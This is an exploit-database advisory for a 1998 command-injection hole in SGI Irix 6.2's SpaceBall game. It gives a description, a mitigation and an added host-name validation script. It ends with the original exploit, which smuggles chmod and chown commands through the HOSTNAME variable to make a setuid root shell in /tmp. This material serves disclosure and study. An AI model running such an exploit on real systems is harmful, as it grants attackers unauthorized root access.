vendor: SpaceBall
by: SecurityFocus
CVSS: 7.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: SpaceBall
Affected Version From: Irix 6.2
Affected Version To: Irix 6.2
Patch Exists: YES
Related CWE: CVE-1998-0206
CPE: o:sgi:irix:6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
1998

SpaceBall Game Security Hole

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics, contains a security hole which could result in the compromise of the root account. The spaceball.sh program takes the contents of the $HOSTNAME variable blindly and does not place quotes around it, so it can be made to execute commands. An attacker can use this vulnerability to gain root privileges on the system.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in system commands.
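
The mitigation above, sketched as an added example (not taken from spaceball.sh, whose contents the page does not show): an allowlist check for an environment-supplied host name, plus a helper that shows how many words an unquoted expansion produces. The function names and the host name iris.example.com are assumptions made for illustration.

```sh
#!/bin/sh
# Added example; not the contents of spaceball.sh, which the page does not show.
LC_ALL=C; export LC_ALL     # keep A-Z / a-z / 0-9 ranges ASCII-only

# Succeed only if $1 is shaped like a host name: letters, digits, '-' and '.',
# at most 255 characters, no leading '-' or '.', no empty label.
valid_hostname() {
    case "$1" in
        '' | -* | .* | *..* | *[!A-Za-z0-9.-]*) return 1 ;;
    esac
    [ "${#1}" -le 255 ]
}

# Count the words the shell makes from an UNQUOTED expansion of $1.
# A well-formed host name yields 1; anything higher means extra arguments
# (or a whole command line) would reach whatever consumes the variable.
unquoted_fields() {
    set -f          # no globbing: measure word splitting only
    set -- $1       # deliberately unquoted
    set +f
    echo "$#"
}

# Print $1 if it validates; otherwise complain and fail. Callers keep the
# result in double quotes wherever they use it.
checked_hostname() {
    if valid_hostname "$1"; then
        printf '%s\n' "$1"
    else
        echo "refusing host name: not a valid name" >&2
        return 1
    fi
}

# Demo with the HOSTNAME value from the advisory and a constructed good name.
for candidate in '/bin/chmod 4755 /tmp/sh' 'iris.example.com'; do
    if name=$(checked_hostname "$candidate" 2>/dev/null); then
        echo "accepted: \"$name\""
    else
        echo "rejected: splits into $(unquoted_fields "$candidate") words unquoted"
    fi
done
```
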
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/471/info

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics, contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh